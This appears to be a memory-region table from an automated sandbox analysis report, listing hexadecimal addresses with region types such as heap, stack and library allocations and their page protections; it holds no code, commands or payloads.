45F0000
|
trusted library allocation
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7252000
|
remote allocation
|
page execute and read and write
|
||
|
1B9F840D000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
75BE000
|
stack
|
page read and write
|
||
|
1B9F67B5000
|
system
|
page execute and read and write
|
||
|
3230000
|
heap
|
page readonly
|
||
|
8097000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
57D0000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
80B0000
|
heap
|
page read and write
|
||
|
2F4C000
|
stack
|
page read and write
|
||
|
4C9A000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
24696000
|
unclassified section
|
page execute and read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
1940000
|
unkown
|
page readonly
|
||
|
14B0000
|
heap
|
page read and write
|
||
|
73BE000
|
stack
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
20B5AA8C000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
73E000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4718000
|
trusted library allocation
|
page read and write
|
||
|
5E10000
|
direct allocation
|
page read and write
|
||
|
5F82000
|
heap
|
page read and write
|
||
|
2CFD000
|
stack
|
page read and write
|
||
|
4DDA000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
unkown
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
20B5C2B0000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
8280000
|
trusted library allocation
|
page execute and read and write
|
||
|
5999000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
9FA000
|
heap
|
page read and write
|
||
|
1B9F6760000
|
system
|
page execute and read and write
|
||
|
8580000
|
trusted library allocation
|
page read and write
|
||
|
4FBF000
|
stack
|
page read and write
|
||
|
359A000
|
heap
|
page read and write
|
||
|
1B9F68DC000
|
heap
|
page read and write
|
||
|
3595000
|
heap
|
page read and write
|
||
|
8F62000
|
direct allocation
|
page execute and read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
7EE20000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
759A000
|
trusted library allocation
|
page read and write
|
||
|
50DA000
|
trusted library allocation
|
page read and write
|
||
|
23F25000
|
heap
|
page read and write
|
||
|
8790000
|
direct allocation
|
page read and write
|
||
|
3657000
|
heap
|
page read and write
|
||
|
74F3000
|
heap
|
page read and write
|
||
|
4D97000
|
trusted library allocation
|
page read and write
|
||
|
74EC000
|
heap
|
page read and write
|
||
|
210000
|
unkown
|
page readonly
|
||
|
5452000
|
remote allocation
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
81A4000
|
heap
|
page read and write
|
||
|
4C76000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
836000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
732F000
|
stack
|
page read and write
|
||
|
23F41000
|
heap
|
page read and write
|
||
|
21330000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
heap
|
page readonly
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
2EFC000
|
stack
|
page read and write
|
||
|
21690000
|
direct allocation
|
page read and write
|
||
|
A362000
|
direct allocation
|
page execute and read and write
|
||
|
24240000
|
heap
|
page read and write
|
||
|
4CB9000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B5E604000
|
trusted library allocation
|
page read and write
|
||
|
829E000
|
heap
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
DB1000
|
unkown
|
page readonly
|
||
|
3631000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
246C0000
|
heap
|
page read and write
|
||
|
23970000
|
remote allocation
|
page read and write
|
||
|
1B9F68E3000
|
heap
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
8190000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CF4000
|
trusted library allocation
|
page read and write
|
||
|
1460000
|
unkown
|
page readonly
|
||
|
5302000
|
heap
|
page read and write
|
||
|
5F69000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
80C0000
|
heap
|
page readonly
|
||
|
225000
|
unkown
|
page read and write
|
||
|
6DC0000
|
direct allocation
|
page read and write
|
||
|
71C6000
|
heap
|
page read and write
|
||
|
837000
|
heap
|
page read and write
|
||
|
3D2C000
|
unkown
|
page read and write
|
||
|
6A45000
|
heap
|
page execute and read and write
|
||
|
8075000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
20B5AA4B000
|
heap
|
page read and write
|
||
|
20B5CFCA000
|
trusted library allocation
|
page read and write
|
||
|
1326000
|
system
|
page execute and read and write
|
||
|
2D13000
|
heap
|
page read and write
|
||
|
8467000
|
heap
|
page read and write
|
||
|
2129E000
|
stack
|
page read and write
|
||
|
365C000
|
heap
|
page read and write
|
||
|
6C50000
|
direct allocation
|
page read and write
|
||
|
1940000
|
unkown
|
page readonly
|
||
|
4AF1000
|
heap
|
page read and write
|
||
|
4C1E000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
82AE000
|
heap
|
page read and write
|
||
|
BBF000
|
heap
|
page read and write
|
||
|
57E000
|
stack
|
page read and write
|
||
|
92F000
|
stack
|
page read and write
|
||
|
23F3A000
|
heap
|
page read and write
|
||
|
6A3E000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
5CF5000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
50F2000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4830000
|
trusted library allocation
|
page read and write
|
||
|
1331000
|
system
|
page execute and read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
3418000
|
heap
|
page read and write
|
||
|
2B98000
|
heap
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
direct allocation
|
page read and write
|
||
|
212DE000
|
stack
|
page read and write
|
||
|
840C000
|
stack
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
3200000
|
direct allocation
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
4906000
|
trusted library allocation
|
page read and write
|
||
|
4D0F000
|
trusted library allocation
|
page read and write
|
||
|
313C000
|
unkown
|
page read and write
|
||
|
225000
|
unkown
|
page read and write
|
||
|
4AF1000
|
heap
|
page read and write
|
||
|
1480000
|
unkown
|
page read and write
|
||
|
58A1000
|
trusted library allocation
|
page read and write
|
||
|
7F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BDE000
|
unclassified section
|
page read and write
|
||
|
2163C000
|
stack
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
5EF8000
|
heap
|
page read and write
|
||
|
23F89000
|
heap
|
page read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
239AE000
|
stack
|
page read and write
|
||
|
6FC000
|
stack
|
page read and write
|
||
|
3655000
|
heap
|
page read and write
|
||
|
359A000
|
heap
|
page read and write
|
||
|
23D86000
|
direct allocation
|
page execute and read and write
|
||
|
8190000
|
direct allocation
|
page read and write
|
||
|
23F41000
|
heap
|
page read and write
|
||
|
53E1000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
359A000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
1490000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
2BCD000
|
stack
|
page read and write
|
||
|
3621000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
74FB000
|
trusted library allocation
|
page read and write
|
||
|
6F98000
|
heap
|
page read and write
|
||
|
3240000
|
direct allocation
|
page read and write
|
||
|
23F89000
|
heap
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
8190000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E5C000
|
unclassified section
|
page read and write
|
||
|
296D000
|
stack
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
4490000
|
heap
|
page readonly
|
||
|
3607000
|
heap
|
page read and write
|
||
|
536C000
|
stack
|
page read and write
|
||
|
365D000
|
heap
|
page read and write
|
||
|
3717000
|
heap
|
page read and write
|
||
|
6CFD000
|
heap
|
page read and write
|
||
|
21E000
|
unkown
|
page readonly
|
||
|
4CE7000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
21BCF000
|
heap
|
page read and write
|
||
|
8760000
|
direct allocation
|
page read and write
|
||
|
2F96000
|
stack
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
C2F000
|
stack
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3540000
|
trusted library allocation
|
page read and write
|
||
|
1328000
|
system
|
page execute and read and write
|
||
|
2A868EF0000
|
heap
|
page read and write
|
||
|
829A000
|
heap
|
page read and write
|
||
|
23F26000
|
heap
|
page read and write
|
||
|
1B9F85AD000
|
trusted library allocation
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
6ECB000
|
stack
|
page read and write
|
||
|
7FFD9B5F0000
|
trusted library allocation
|
page read and write
|
||
|
7438000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
43F0000
|
heap
|
page read and write
|
||
|
12D000
|
stack
|
page read and write
|
||
|
8215000
|
trusted library allocation
|
page read and write
|
||
|
29FF000
|
stack
|
page read and write
|
||
|
8262000
|
heap
|
page read and write
|
||
|
2F30000
|
unkown
|
page readonly
|
||
|
2417A000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
237D0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
45C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
20B5AA61000
|
heap
|
page read and write
|
||
|
4B0A000
|
heap
|
page read and write
|
||
|
363E000
|
heap
|
page read and write
|
||
|
49C9000
|
trusted library allocation
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
23E6D000
|
unclassified section
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4050000
|
unkown
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
DC0000
|
unkown
|
page readonly
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
20B74908000
|
heap
|
page read and write
|
||
|
2E0E000
|
stack
|
page read and write
|
||
|
5F84000
|
heap
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
8730000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
20B6C7B1000
|
trusted library allocation
|
page read and write
|
||
|
3649000
|
heap
|
page read and write
|
||
|
87CE000
|
stack
|
page read and write
|
||
|
6C10000
|
direct allocation
|
page read and write
|
||
|
4C75000
|
heap
|
page read and write
|
||
|
74A6000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
74E4000
|
trusted library allocation
|
page read and write
|
||
|
3657000
|
heap
|
page read and write
|
||
|
35F3000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
596000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23F41000
|
heap
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4460000
|
trusted library allocation
|
page read and write
|
||
|
21670000
|
direct allocation
|
page read and write
|
||
|
522E000
|
stack
|
page read and write
|
||
|
20B5A9B5000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2469C000
|
unclassified section
|
page execute and read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
9F4000
|
heap
|
page read and write
|
||
|
367B2000
|
system
|
page read and write
|
||
|
23F2C000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
20B5AA45000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
B6C000
|
heap
|
page read and write
|
||
|
7204000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
5F82000
|
heap
|
page read and write
|
||
|
5EA0000
|
heap
|
page read and write
|
||
|
71FE000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
81DC000
|
stack
|
page read and write
|
||
|
23F29000
|
heap
|
page read and write
|
||
|
82D5000
|
trusted library allocation
|
page read and write
|
||
|
663E000
|
stack
|
page read and write
|
||
|
6E3E000
|
stack
|
page read and write
|
||
|
561E000
|
stack
|
page read and write
|
||
|
1B9F8412000
|
trusted library allocation
|
page read and write
|
||
|
2EAB000
|
stack
|
page read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
3B19000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B791000
|
trusted library allocation
|
page read and write
|
||
|
6CED000
|
stack
|
page read and write
|
||
|
BB7000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
21AA6000
|
heap
|
page read and write
|
||
|
23F74000
|
heap
|
page read and write
|
||
|
4728000
|
unclassified section
|
page read and write
|
||
|
5C5E000
|
stack
|
page read and write
|
||
|
3CBD000
|
direct allocation
|
page execute and read and write
|
||
|
BCC000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
4500000
|
heap
|
page execute and read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
706E000
|
stack
|
page read and write
|
||
|
5CF7000
|
heap
|
page read and write
|
||
|
2AA0000
|
unkown
|
page readonly
|
||
|
22FC000
|
heap
|
page read and write
|
||
|
3CC1000
|
direct allocation
|
page execute and read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
5C9E000
|
stack
|
page read and write
|
||
|
28FF000
|
unkown
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8410000
|
heap
|
page read and write
|
||
|
846B000
|
heap
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4420000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23C8E000
|
stack
|
page read and write
|
||
|
4790000
|
heap
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
2157E000
|
stack
|
page read and write
|
||
|
4C75000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
363C000
|
heap
|
page read and write
|
||
|
23ACE000
|
stack
|
page read and write
|
||
|
23D5B000
|
unclassified section
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3595000
|
heap
|
page read and write
|
||
|
33DE000
|
stack
|
page read and write
|
||
|
1B9F85C4000
|
trusted library allocation
|
page read and write
|
||
|
6C1E000
|
stack
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3590000
|
unkown
|
page execute and read and write
|
||
|
3668000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1494000
|
heap
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
365D000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3647000
|
heap
|
page read and write
|
||
|
454E000
|
stack
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
45C1000
|
trusted library allocation
|
page read and write
|
||
|
2182C000
|
stack
|
page read and write
|
||
|
23F41000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
6C5E000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
884E000
|
stack
|
page read and write
|
||
|
4C6E000
|
heap
|
page read and write
|
||
|
21F21000
|
direct allocation
|
page execute and read and write
|
||
|
8320000
|
heap
|
page read and write
|
||
|
24640000
|
unclassified section
|
page execute and read and write
|
||
|
2D1337E000
|
stack
|
page read and write
|
||
|
225000
|
unkown
|
page read and write
|
||
|
7C8000
|
stack
|
page read and write
|
||
|
4698000
|
heap
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
6C20000
|
direct allocation
|
page read and write
|
||
|
4600000
|
trusted library allocation
|
page read and write
|
||
|
23FB1000
|
heap
|
page read and write
|
||
|
2A868FC0000
|
heap
|
page read and write
|
||
|
2D1383E000
|
stack
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
4D70000
|
unclassified section
|
page read and write
|
||
|
BCC000
|
heap
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
2F30000
|
unkown
|
page readonly
|
||
|
2CB1000
|
heap
|
page read and write
|
||
|
3591000
|
heap
|
page read and write
|
||
|
2D1307E000
|
stack
|
page read and write
|
||
|
4C7E000
|
heap
|
page read and write
|
||
|
365B000
|
heap
|
page read and write
|
||
|
12B0000
|
unkown
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7397000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
5E60000
|
direct allocation
|
page read and write
|
||
|
12B0000
|
unkown
|
page read and write
|
||
|
57D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
34E8000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page readonly
|
||
|
CFC000
|
stack
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
4596000
|
unclassified section
|
page read and write
|
||
|
36DB4000
|
system
|
page read and write
|
||
|
23F1A000
|
heap
|
page read and write
|
||
|
4670000
|
heap
|
page readonly
|
||
|
3401000
|
heap
|
page read and write
|
||
|
51A1000
|
heap
|
page read and write
|
||
|
360F000
|
stack
|
page read and write
|
||
|
5E50000
|
direct allocation
|
page read and write
|
||
|
4B21000
|
heap
|
page read and write
|
||
|
1190000
|
unkown
|
page readonly
|
||
|
2FFE000
|
stack
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
3B9A000
|
unkown
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
3611000
|
heap
|
page read and write
|
||
|
2B0A000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
9883000
|
direct allocation
|
page execute and read and write
|
||
|
8980000
|
trusted library allocation
|
page execute and read and write
|
||
|
3631000
|
heap
|
page read and write
|
||
|
8CC0000
|
direct allocation
|
page execute and read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23F2C000
|
heap
|
page read and write
|
||
|
49EF000
|
stack
|
page read and write
|
||
|
363C000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
BBF000
|
heap
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
134D000
|
system
|
page execute and read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
241B1000
|
heap
|
page read and write
|
||
|
6E60000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7428000
|
trusted library allocation
|
page read and write
|
||
|
23D71000
|
direct allocation
|
page execute and read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
55DF000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
57E0000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
23F1A000
|
heap
|
page read and write
|
||
|
BA5000
|
heap
|
page read and write
|
||
|
1B9F85CE000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
4C51000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
365D000
|
heap
|
page read and write
|
||
|
5E00000
|
direct allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
7CD000
|
stack
|
page read and write
|
||
|
7298000
|
trusted library allocation
|
page read and write
|
||
|
2CF8000
|
heap
|
page read and write
|
||
|
36E4000
|
unkown
|
page read and write
|
||
|
23F89000
|
heap
|
page read and write
|
||
|
73EB000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
4E6E000
|
stack
|
page read and write
|
||
|
3022000
|
unkown
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D90000
|
direct allocation
|
page read and write
|
||
|
533E000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8780000
|
direct allocation
|
page read and write
|
||
|
2AFE000
|
stack
|
page read and write
|
||
|
53E2000
|
heap
|
page read and write
|
||
|
848E000
|
stack
|
page read and write
|
||
|
34EE000
|
heap
|
page read and write
|
||
|
9F8000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
DF8000
|
heap
|
page read and write
|
||
|
4D93000
|
trusted library allocation
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
4C5C000
|
heap
|
page read and write
|
||
|
35F0000
|
heap
|
page read and write
|
||
|
365C000
|
heap
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
20B5DA03000
|
trusted library allocation
|
page read and write
|
||
|
2384E000
|
stack
|
page read and write
|
||
|
3344000
|
heap
|
page read and write
|
||
|
23F44000
|
heap
|
page read and write
|
||
|
53E1000
|
heap
|
page read and write
|
||
|
49FA000
|
trusted library allocation
|
page read and write
|
||
|
4AF1000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1B9F8180000
|
trusted library allocation
|
page read and write
|
||
|
4CAF000
|
heap
|
page read and write
|
||
|
34EF000
|
heap
|
page read and write
|
||
|
12C5000
|
heap
|
page read and write
|
||
|
20B5C460000
|
heap
|
page read and write
|
||
|
2FD4000
|
heap
|
page read and write
|
||
|
5F84000
|
heap
|
page read and write
|
||
|
B4C000
|
heap
|
page read and write
|
||
|
4C4F000
|
heap
|
page read and write
|
||
|
466E000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
240A3000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
1490000
|
heap
|
page read and write
|
||
|
333D000
|
heap
|
page read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
3651000
|
heap
|
page read and write
|
||
|
3628000
|
heap
|
page read and write
|
||
|
3FBF000
|
unkown
|
page execute and read and write
|
||
|
4605000
|
trusted library allocation
|
page execute and read and write
|
||
|
15B0000
|
unkown
|
page readonly
|
||
|
6DAF000
|
stack
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
359A000
|
heap
|
page read and write
|
||
|
363E000
|
heap
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
B69000
|
heap
|
page read and write
|
||
|
2372F000
|
stack
|
page read and write
|
||
|
10C0000
|
unkown
|
page readonly
|
||
|
3637000
|
heap
|
page read and write
|
||
|
3647000
|
heap
|
page read and write
|
||
|
20B74904000
|
heap
|
page read and write
|
||
|
813D000
|
stack
|
page read and write
|
||
|
6A8F000
|
stack
|
page read and write
|
||
|
23F41000
|
heap
|
page read and write
|
||
|
35F3000
|
heap
|
page read and write
|
||
|
20B5C2D0000
|
trusted library allocation
|
page read and write
|
||
|
29EC000
|
heap
|
page read and write
|
||
|
1B9F68CC000
|
heap
|
page read and write
|
||
|
3540000
|
trusted library allocation
|
page read and write
|
||
|
2411C000
|
heap
|
page read and write
|
||
|
9DA000
|
stack
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
20B74C4A000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
348F000
|
stack
|
page read and write
|
||
|
3639000
|
heap
|
page read and write
|
||
|
8195000
|
heap
|
page read and write
|
||
|
2FB4000
|
stack
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
274E000
|
stack
|
page read and write
|
||
|
6DB0000
|
direct allocation
|
page read and write
|
||
|
6CDA000
|
stack
|
page read and write
|
||
|
20B5E5A9000
|
trusted library allocation
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
44E0000
|
trusted library allocation
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
5F86000
|
heap
|
page read and write
|
||
|
20B5E5CD000
|
trusted library allocation
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
20B5C465000
|
heap
|
page read and write
|
||
|
6BDB000
|
stack
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
5CF0000
|
heap
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
6D2D000
|
stack
|
page read and write
|
||
|
23800000
|
direct allocation
|
page read and write
|
||
|
21F1D000
|
direct allocation
|
page execute and read and write
|
||
|
6D80000
|
direct allocation
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
758000
|
heap
|
page read and write
|
||
|
7FFD9B7C2000
|
trusted library allocation
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
BAA000
|
heap
|
page read and write
|
||
|
1B9F8300000
|
trusted library allocation
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
4430000
|
trusted library allocation
|
page read and write
|
||
|
4C9A000
|
heap
|
page read and write
|
||
|
20B5CC54000
|
trusted library allocation
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
8416000
|
heap
|
page read and write
|
||
|
4434000
|
trusted library allocation
|
page read and write
|
||
|
3401000
|
heap
|
page read and write
|
||
|
8280000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
76AD000
|
stack
|
page read and write
|
||
|
20B5E7B4000
|
trusted library allocation
|
page read and write
|
||
|
20B74B70000
|
heap
|
page read and write
|
||
|
87C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8181000
|
